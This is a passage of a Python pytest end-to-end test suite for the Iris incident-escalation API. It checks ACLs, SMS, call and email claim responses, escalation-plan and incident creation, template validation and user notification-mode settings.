if application['name'] != superuser_application:
return application['name']
@pytest.fixture(scope='module')
def sample_application_name2(iris_applications, superuser_application, sample_application_name):
'''Name of an application which is neither sample_application_name or superuser_application'''
for application in iris_applications:
if application['name'] not in (superuser_application, sample_application_name):
return application['name']
@pytest.fixture(scope='module')
def sample_template_name(sample_application_name, sample_application_name2):
'''A template which is used by sample_application_name but not sample_application_name2'''
re = requests.get(base_url + 'templates?active=1')
assert re.status_code == 200
templates = re.json()
for template in templates:
re = requests.get(base_url + 'templates/' + template['name'])
assert re.status_code == 200
template_data = re.json()
if sample_application_name in template_data['content'] and sample_application_name2 not in template_data['content']:
return template['name']
@pytest.fixture(scope='module')
def sample_plan_name():
'''List of iris messages'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `name` FROM `plan_active` LIMIT 1')
result = cursor.fetchone()
if result:
return result[0]
@pytest.fixture(scope='module')
def sample_mode():
'''List of iris messages'''
modes = requests.get(base_url + 'modes').json()
if modes:
return modes[0]
@pytest.fixture(scope='module')
def sample_priority():
''' A sample priority '''
priorities = requests.get(base_url + 'priorities').json()
if priorities:
return priorities[0]['name']
def create_incident_with_message(application, plan, target, mode):
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''INSERT INTO `incident` (`plan_id`, `created`, `context`, `current_step`, `active`, `application_id`)
VALUES (
(SELECT `plan_id` from `plan_active` WHERE `name` = %(plan)s),
NOW(),
"{}",
0,
TRUE,
(SELECT `id` FROM `application` WHERE `name` = %(application)s)
)''', {'application': application, 'plan': plan})
incident_id = cursor.lastrowid
assert incident_id
cursor.execute('''INSERT INTO `message` (`created`, `application_id`, `target_id`, `priority_id`, `mode_id`, `active`, `incident_id`)
VALUES(
NOW(),
(SELECT `id` FROM `application` WHERE `name` = %(application)s),
(SELECT `id` FROM `target` WHERE `name` = %(target)s),
(SELECT `id` FROM `priority` WHERE `name` = 'low'),
(SELECT `id` FROM `mode` WHERE `name` = %(mode)s),
TRUE,
%(incident_id)s
)''', {'application': application, 'target': target, 'mode': mode, 'incident_id': incident_id})
assert cursor.lastrowid
conn.commit()
return incident_id
def test_api_acls(sample_user, sample_user2):
re = requests.get(base_url + 'users/' + sample_user)
assert re.status_code == 401
assert re.json()['title'] == 'Username must be specified for this action'
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user2))
assert re.status_code == 401
assert re.json()['title'] == 'This user is not allowed to access this resource'
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
re = requests.get(base_url + 'users/' + sample_user2, headers=username_header(sample_user2))
assert re.status_code == 200
def test_api_bad_application():
re = requests.post(base_url + 'incidents', headers={'Authorization': 'hmac fakeapplication123234234:abc'})
assert re.status_code == 401
def test_api_response_phone_call(fake_message_id, fake_incident_id, sample_phone):
if not all([fake_message_id, fake_incident_id, sample_phone]):
pytest.skip('We do not have enough data in DB to do this test')
data = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'To': sample_phone,
'ToZip': 15108,
'FromState': 'CA',
'Digits': 2,
'From': '+16504222677'
}
re = requests.post(base_url + 'response/twilio/calls', params={
'message_id': fake_message_id,
}, data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"Iris incident(%s) claimed."}' % fake_incident_id
def test_api_response_batch_phone_call(fake_batch_id, sample_phone):
if not all([fake_batch_id, sample_phone]):
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'To': sample_phone,
'ToZip': 15108,
'FromState': 'CA',
'Digits': '2',
'From': '+16504222677',
}
re = requests.post(base_url + 'response/twilio/calls', params={
'message_id': fake_batch_id,
}, data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"All iris incidents claimed for batch id %s."}' % fake_batch_id
def test_api_response_sms(fake_message_id, fake_incident_id, sample_phone):
if not all([fake_message_id, fake_incident_id, sample_phone]):
pytest.skip('Failed finding a batch ID to use for tests')
base_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': sample_phone,
}
data = base_body.copy()
data['Body'] = '%s claim arg1 arg2' % fake_message_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"Iris incident(%s) claimed."}' % fake_incident_id
data = base_body.copy()
data['Body'] = 'Claim %s claim arg1 arg2' % fake_message_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"Iris incident(%s) claimed."}' % fake_incident_id
data = base_body.copy()
data['Body'] = fake_message_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 400
assert re.json()['title'] == 'Invalid response'
def test_api_response_batch_sms(fake_batch_id):
if not fake_batch_id:
pytest.skip('Failed finding a batch ID to use for tests')
base_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': '+14123706122',
}
data = base_body.copy()
data['Body'] = '%s claim arg1 arg2' % fake_batch_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"All iris incidents claimed for batch id %s."}' % fake_batch_id
data = base_body.copy()
data['Body'] = '%s claim arg1 arg2' % '*(fasdf'
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 400
def test_api_response_claim_all(sample_user, sample_phone, sample_application_name, sample_application_name2, sample_plan_name, sample_email):
if not all([sample_user, sample_phone, sample_application_name, sample_plan_name]):
pytest.skip('Not enough data for this test')
sms_claim_all_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': sample_phone,
'Body': 'claim all'
}
email_claim_all_payload = {
'body': 'claim all',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
# Clear out any existing unclaimed incidents, so they don't interfere with these tests
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
# Shouldn't be any incidents. Verify response in this case.
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
assert re.json()['app_response'] == 'No incidents to claim'
# Verify SMS with two incidents from the same app
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
assert re.json()['app_response'] in ('Iris Incidents claimed (2): %s, %s' % (incident_id_1, incident_id_2),
'Iris Incidents claimed (2): %s, %s' % (incident_id_2, incident_id_1))
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify email with two incidents from the same app
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.post(base_url + 'response/gmail', json=email_claim_all_payload)
assert re.status_code == 204
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify SMS with two incidents from different apps
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name2, sample_plan_name, sample_user, 'sms')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
# Response will be two lines, one for each application and its claimed incidents
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
assert set(re.json()['app_response'].splitlines()) == {'%s: Iris Incidents claimed (1): %s' % (sample_application_name, incident_id_1),
'%s: Iris Incidents claimed (1): %s' % (sample_application_name2, incident_id_2)}
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify email with two incidents from different apps
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name2, sample_plan_name, sample_user, 'email')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.post(base_url + 'response/gmail', json=email_claim_all_payload)
assert re.status_code == 204
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
def test_api_response_claim_last(sample_user, sample_phone, sample_application_name, sample_plan_name, sample_email):
if not all([sample_user, sample_phone, sample_application_name, sample_plan_name]):
pytest.skip('Not enough data for this test')
# Verify SMS
incident_id = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 1
sms_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': sample_phone,
'Body': 'claim last'
}
re = requests.post(base_url + 'response/twilio/messages', data=sms_body)
assert re.status_code == 200
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify email
incident_id = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 1
data = {
'body': 'claim last',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 0
def test_api_response_email(fake_message_id, sample_email):
if not all([fake_message_id, sample_email]):
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'body': '%s claim' % fake_message_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': 'claim %s' % fake_message_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': 'claim',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'Re: %s Alert That Is Firing' % fake_message_id}
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
def test_api_response_invalid_email(fake_message_id):
if not fake_message_id:
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'body': '%s claim' % fake_message_id,
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 400
def test_api_response_gmail_one_click(fake_message_id, sample_email):
if not all([fake_message_id, sample_email]):
pytest.skip('Failed finding a batch ID to use for tests')
re = requests.post(base_url + 'response/gmail-oneclick', json={
'msg_id': fake_message_id,
'email_address': sample_email,
'cmd': 'claim'
})
assert re.status_code == 204
re = requests.post(base_url + 'response/gmail-oneclick', json={
'msg_id': 'fakemessageid',
'email_address': sample_email,
'cmd': 'claim'
})
assert re.status_code == 400
re = requests.post(base_url + 'response/gmail-oneclick', json={})
assert re.status_code == 400
def test_api_response_batch_email(fake_batch_id, sample_email):
if not fake_batch_id:
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'body': '%s claim' % fake_batch_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': 'claim %s' % fake_batch_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': u'I\u0131d claim',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 400
def test_plan_routing():
re = requests.get(base_url + 'plans/TESTDOOOOT')
assert re.content == ""
assert re.status_code == 404
def test_post_plan(sample_user, sample_team, sample_template_name):
data = {
"creator": sample_user,
"name": sample_user + "-test-foo",
"description": "Test plan for e2e test",
"threshold_window": 900,
"threshold_count": 10,
"aggregation_window": 300,
"aggregation_reset": 300,
"steps": [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
{
"role": "oncall-primary",
"target": sample_team,
"priority": "high",
"wait": 300,
"repeat": 1,
"template": sample_template_name
},
],
[
{
"role": "oncall-primary",
"target": sample_team,
"priority": "urgent",
"wait": 300,
"repeat": 1,
"template": sample_template_name
},
{
"role": "team",
"target": sample_team,
"priority": "medium",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
]
],
"isValid": True
}
# sort list so it's easier to compare
data['steps'][0] = sorted(data['steps'][0], key=lambda x: x['priority'])
data['steps'][1] = sorted(data['steps'][1], key=lambda x: x['priority'])
data['steps'] = sorted(data['steps'], key=lambda x: x[0]['priority'] + x[1]['priority'])
# Test post to plans endpoint (create plan)
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 201
plan_id = re.content.strip()
new_data = requests.get(base_url + 'plans/' + str(plan_id)).json()
assert new_data['name'] == data['name']
assert new_data['creator'] == data['creator']
assert new_data['description'] == data['description']
assert len(new_data['steps']) == len(data['steps'])
new_data['steps'][0] = sorted(new_data['steps'][0], key=lambda x: x['priority'])
new_data['steps'][1] = sorted(new_data['steps'][1], key=lambda x: x['priority'])
new_data['steps'] = sorted(new_data['steps'], key=lambda x: x[0]['priority'] + x[1]['priority'])
for k in ('role', 'target', 'priority', 'wait', 'repeat', 'template'):
assert new_data['steps'][0][0][k] == data['steps'][0][0][k]
assert new_data['steps'][0][1][k] == data['steps'][0][1][k]
assert new_data['steps'][1][0][k] == data['steps'][1][0][k]
assert new_data['steps'][1][1][k] == data['steps'][1][1][k]
# Test post to plan endpoint (mark active/inactive)
re = requests.post(base_url + 'plans/' + plan_id, json={'active': 0})
assert re.status_code == 200
assert re.content == '0'
# Malformed requests
re = requests.post(base_url + 'plans/' + plan_id, json={})
assert re.status_code == 400
re = requests.post(base_url + 'plans/' + plan_id, json={'active': 'fakeint'})
assert re.status_code == 400
re = requests.get(base_url + 'plans?active=0&name__contains=%s-test-foo&creator__eq=%s' % (sample_user, sample_user))
assert re.status_code == 200
# >= 1 because no database cleanup after test
assert len(re.json()) >= 1
re = requests.post(base_url + 'plans/' + plan_id, json={'active': 1})
assert re.status_code == 200
assert re.content == '1'
# Test get plan endpoint (plan search)
re = requests.get(base_url + 'plans?active=1&name__contains=%s-test-foo' % sample_user)
assert re.status_code == 200
assert len(re.json()) == 1
# Test limit clause
re = requests.get(base_url + 'plans?active=0&limit=1')
assert re.status_code == 200
assert len(re.json()) == 1
# Test errors
bad_step = {"role": "foo",
"target": sample_team,
"priority": "medium",
"wait": 600,
"repeat": 0,
"template": sample_template_name}
# Test bad role
data['steps'][0][0] = bad_step
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json()['description'] == 'Role not found for step 1'
# Test bad target
bad_step['role'] = 'user'
bad_step['target'] = 'nonexistentUser'
data['steps'][0][0] = bad_step
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json()['description'] == 'Target nonexistentUser not found for step 1'
# Test bad priority
bad_step['target'] = sample_team
bad_step['priority'] = 'foo'
data['steps'][0][0] = bad_step
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json()['description'] == 'Priority not found for step 1'
def test_post_invalid_step_role(sample_user, sample_team, sample_template_name):
data = {
'creator': sample_user,
'name': sample_user + '-test-foo',
'description': 'Test plan for e2e test',
'threshold_window': 900,
'threshold_count': 10,
'aggregation_window': 300,
'aggregation_reset': 300,
'steps': [
[
{
'role': 'oncall-primary',
'target': sample_user,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_template_name
},
],
],
'isValid': True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json() == {'description': 'Role oncall-primary is not appropriate for target %s in step 1' % sample_user, 'title': 'Invalid role'}
data = {
'creator': sample_user,
'name': sample_user + '-test-foo',
'description': 'Test plan for e2e test',
'threshold_window': 900,
'threshold_count': 10,
'aggregation_window': 300,
'aggregation_reset': 300,
'steps': [
[
{
'role': 'user',
'target': sample_team,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_template_name
},
],
],
'isValid': True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json() == {'description': 'Role user is not appropriate for target %s in step 1' % sample_team, 'title': 'Invalid role'}
def test_post_incident(sample_user, sample_team, sample_application_name, sample_template_name):
data = {
"creator": sample_user,
"name": sample_user + "-test-incident-post",
"description": "Test plan for e2e test",
"threshold_window": 900,
"threshold_count": 10,
"aggregation_window": 300,
"aggregation_reset": 300,
"steps": [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
{
"role": "oncall-primary",
"target": sample_team,
"priority": "high",
"wait": 300,
"repeat": 1,
"template": sample_template_name
},
],
],
"isValid": True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 201
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
incident_id = int(re.content)
assert re.status_code == 201
re = requests.get(base_url + 'incidents/%s' % re.content.strip())
assert re.status_code == 200
re = requests.post(base_url + 'incidents/%d' % (incident_id, ), json={
'owner': sample_user,
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 200
assert re.json() == {'owner': sample_user, 'incident_id': incident_id, 'active': False}
def test_post_incident_change_application(sample_user, sample_application_name, sample_application_name2, superuser_application):
# superuser_application (iris-frontend) is allowed to create incidents as other apps, so this works
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
'application': sample_application_name,
}, headers={'Authorization': 'hmac %s:abc' % superuser_application})
incident_id = int(re.content)
assert re.status_code == 201
re = requests.get(base_url + 'incidents/%s' % re.content.strip())
assert re.status_code == 200
assert re.json()['application'] == sample_application_name
re = requests.post(base_url + 'incidents/%d' % (incident_id, ), json={
'owner': sample_user,
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 200
assert re.json() == {'owner': sample_user, 'incident_id': incident_id, 'active': False}
# sample_application_name2 is not allowed to make plans as sample_application_name, so this will fail
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
'application': sample_application_name2,
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 403
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
'application': 'fakeapp234234',
}, headers={'Authorization': 'hmac %s:abc' % superuser_application})
assert re.status_code == 400
def test_post_incident_without_apps(sample_user, sample_team, sample_template_name, sample_application_name2):
data = {
"creator": sample_user,
"name": sample_user + "-test-incident-post",
"description": "Test plan for e2e test",
"threshold_window": 900,
"threshold_count": 10,
"aggregation_window": 300,
"aggregation_reset": 300,
"steps": [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
],
],
"isValid": True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 201
# The application in sample_application_name2 does not have any sample_template_name templates, so this
# will fail
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name2})
assert re.status_code == 400
def test_post_incident_invalid_plan_name(sample_application_name):
re = requests.post(base_url + 'incidents', json={
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 400
re = requests.post(base_url + 'incidents', json={
'plan': 'foo-123-xyz-adskhpb',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 404
def test_create_invalid_template(sample_user, sample_application_name):
valid_template = {
"creator": sample_user,
"name": "test template",
"content": {
sample_application_name: {
"call": {"subject": "", "body": "{{nodes}}"},
"email": {"subject": "123", "body": "123"},
"im": {"subject": "", "body": "123"},
"sms": {"subject": "", "body": "123"}
}
}
}
invalid_template = valid_template.copy()
del invalid_template['creator']
re = requests.post(base_url + 'templates', json=invalid_template)
assert re.status_code == 400
assert re.json()['title'] == 'creator argument missing'
invalid_template = valid_template.copy()
del invalid_template['name']
re = requests.post(base_url + 'templates', json=invalid_template)
assert re.status_code == 400
assert re.json()['title'] == 'name argument missing'
def test_active_incidents():
re = requests.get(base_url + 'incidents?active=1')
assert re.status_code == 200
assert isinstance(re.json(), list)
def test_filter_incidents_by_creator(sample_user, sample_user2):
re = requests.get(base_url + 'incidents?target=%s&target=%s' % (sample_user, sample_user2))
assert re.status_code == 200
data = re.json()
assert isinstance(data, list)
re = requests.get(base_url + 'incidents?target=' + sample_user)
assert re.status_code == 200
data = re.json()
assert isinstance(data, list)
def test_api_get_nested_context(sample_user, sample_team, sample_template_name, sample_application_name):
re = requests.post(base_url + 'plans', json={
'name': 'test_nested_plan',
'description': 'foo',
'step_count': 0,
'threshold_window': 1,
'threshold_count': 1,
'aggregation_window': 1,
'aggregation_reset': 1,
'steps': [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
],
],
'creator': sample_user,
})
assert re.status_code == 201
ctx = {
"nodes": [
{
"device": "abc2-efg01.nw.example.com",
"type": "BFD",
"message": "bar",
"component": "NA"
},
],
}
re = requests.post(base_url + 'incidents', json={
'plan': 'test_nested_plan',
'context': ctx,
}, headers={'authorization': 'hmac %s:boop' % sample_application_name})
assert re.status_code == 201
iid = re.content.strip()
re = requests.get(base_url + 'incidents/' + iid)
assert re.status_code == 200
assert re.json()['context']['nodes'] == ctx['nodes']
def test_large_incident_context(sample_user, sample_application_name):
re = requests.post(base_url + 'plans', json={
'name': 'test_nested_plan',
'description': 'foo',
'step_count': 0,
'threshold_window': 1,
'threshold_count': 1,
'aggregation_window': 1,
'aggregation_reset': 1,
'steps': [],
'creator': sample_user,
})
assert re.status_code == 201
ctx = {
"nodes": [
{
"device": "abc2-efg01.nw.example.com" * 10000,
"type": "BFD",
"message": "bar",
"component": "NA"
},
],
}
re = requests.post(base_url + 'incidents', json={
'plan': 'test_nested_plan',
'context': ctx,
}, headers={'authorization': 'hmac %s:boop' % sample_application_name})
assert re.status_code == 400
assert re.json()['title'] == 'Context too long'
def test_get_user_modes(sample_user, sample_application_name):
session = requests.Session()
session.headers = username_header(sample_user)
re = session.get(base_url + 'users/modes/' + sample_user)
assert re.status_code == 200
assert sorted(re.json()) == sorted(['high', 'urgent', 'medium', 'low'])
re = session.get(base_url + 'users/modes/%s?application=%s' % (sample_user, sample_application_name))
assert re.status_code == 200
assert sorted(re.json()) == sorted(['high', 'urgent', 'medium', 'low'])
def test_get_messages(iris_messages):
if len(iris_messages) < 3:
pytest.skip('Skipping this test as we don\'t have enough message IDs')
re = requests.get(base_url + 'messages?id__in=' + ', '.join(str(m['id']) for m in iris_messages[:3])).json()
assert len(re) == 3
re = requests.get(base_url + 'messages?limit=1&id__in=' + ', '.join(str(m['id']) for m in iris_messages[:3])).json()
assert len(re) == 1
re = requests.get(base_url + 'messages?id__in=%s' % iris_messages[1]['id']).json()
assert len(re) == 1
assert re[0]['id'] == iris_messages[1]['id']
re = requests.get(base_url + 'messages/%s' % iris_messages[0]['id']).json()
assert re['id'] == iris_messages[0]['id']
def test_get_messages_not_found():
re = requests.get(base_url + 'messages/0')
assert re.status_code == 404
def test_get_incident(iris_incidents):
if len(iris_incidents) < 3:
pytest.skip('Skipping this test as we don\'t have enough incidents')
re = requests.get(base_url + 'incidents?id__in=' + ', '.join(str(m['id']) for m in iris_incidents[:3])).json()
assert len(re) == 3
re = requests.get(base_url + 'incidents?limit=1&fields=id&id__in=' + ', '.join(str(m['id']) for m in iris_incidents[:3])).json()
assert len(re) == 1
re = requests.get(base_url + 'incidents?id__in=%s' % iris_incidents[1]['id']).json()
assert len(re) == 1
assert re[0]['id'] == iris_incidents[1]['id']
re = requests.get(base_url + 'incidents/%s' % iris_incidents[0]['id']).json()
assert re['id'] == iris_incidents[0]['id']
re = requests.get(base_url + 'incidents/fakeid')
assert re.status_code == 400
re = requests.get(base_url + 'incidents/-1')
assert re.status_code == 404
def test_post_user_modes(sample_user):
session = requests.Session()
session.headers = username_header(sample_user)
change_to = {
'high': 'default',
'urgent': 'default',
'medium': 'im',
'low': 'call'
}
re = session.post(base_url + 'users/modes/' + sample_user, json=change_to)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/' + sample_user)
assert re.status_code == 200
assert re.json() == change_to
# Now test update/delete functionality
change_to['medium'] = 'call'
change_to['low'] = 'default'
re = session.post(base_url + 'users/modes/' + sample_user, json=change_to)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/' + sample_user)
assert re.status_code == 200
assert re.json() == change_to
def test_post_target_application_modes(sample_user, sample_application_name):
session = requests.Session()
session.headers = username_header(sample_user)
mode_data = {
'application': sample_application_name,
'high': 'default',
'urgent': 'default',
'medium': 'im',
'low': 'call'
}
modes = mode_data.copy()
del modes['application']
re = session.post(base_url + 'users/modes/' + sample_user,
json=mode_data)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/%s?application=%s' % (sample_user, sample_application_name))
assert re.status_code == 200
assert re.json() == modes
# Now test update/delete functionality
mode_data['medium'] = 'call'
mode_data['low'] = 'default'
modes = mode_data.copy()
del modes['application']
re = session.post(base_url + 'users/modes/' + sample_user, json=mode_data)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/%s?application=%s' % (sample_user, sample_application_name))
assert re.status_code == 200
assert re.json() == modes
def test_post_target_multiple_application_modes(sample_user, sample_application_name, sample_application_name2):
session = requests.Session()
session.headers = username_header(sample_user)
# Set priorities for two apps in batch, as well as global defaults
modes_per_app = {
'per_app_modes': {
sample_application_name: {
'high': 'sms',
'urgent': 'call',
'medium': 'im',
'low': 'call'
},
sample_application_name2: {
'high': 'email',
'urgent': 'email',
'medium': 'im',
'low': 'call'
},
},
'high': 'call',
'urgent': 'call',
'medium': 'call',
'low': 'call'
}
re = session.post(base_url + 'users/modes/' + sample_user, json=modes_per_app)
assert re.status_code == 200
re = session.get(base_url + 'users/' + sample_user)
assert re.status_code == 200
result = re.json()
assert modes_per_app['per_app_modes'] == result['per_app_modes']
assert all(result['modes'][key] == modes_per_app[key] for key in ['high', 'urgent', 'medium', 'low'])
# Now try deleting both custom apps by setting all to default
modes_per_app_delete = {
'per_app_modes': {
sample_application_name: {
'high': 'default',
'urgent': 'default',
'medium': 'default',
'low': 'default'
},
sample_application_name2: {
'high': 'default',
'urgent': 'default',
'medium': 'default',
'low': 'default'
},
},
'high': 'default',
'urgent': 'default',
'medium': 'default',
'low': 'default'
}
re = session.post(base_url + 'users/modes/' + sample_user, json=modes_per_app_delete)
assert re.status_code == 200
re = session.get(base_url + 'users/' + sample_user)
assert re.status_code == 200
result = re.json()
assert {} == result['per_app_modes'] == result['modes']
def test_create_template(sample_user, sample_application_name):
post_payload = {
'creator': sample_user,
'name': 'test_template',
'content': {
sample_application_name: {
'sms': {'subject': '', 'body': 'test_sms'},
'im': {'subject': '', 'body': 'test_im'},
'call': {'subject': '', 'body': 'test_call'},
'email': {'subject': 'email_subject', 'body': 'email_body'}
}
},
}
re = requests.post(base_url + 'templates/', json=post_payload)
assert re.status_code == 201
template_id = int(re.text)
re = requests.get(base_url + 'templates/%d' % template_id)
assert re.status_code == 200
data = re.json()
re = requests.get(base_url + 'templates/faketemplatethatdoesnotexist')
assert re.status_code == 404
for key in ['name', 'creator', 'content']:
assert post_payload[key] == data[key]
re = requests.post(base_url + 'templates/%d' % template_id, json={'active': 0})
assert re.status_code == 200
re = requests.post(base_url + 'templates/%d' % template_id, json={'active': 'sdfdsf'})
assert re.status_code == 400
re = requests.post(base_url + 'templates/%d' % template_id, json={})
assert re.status_code == 400
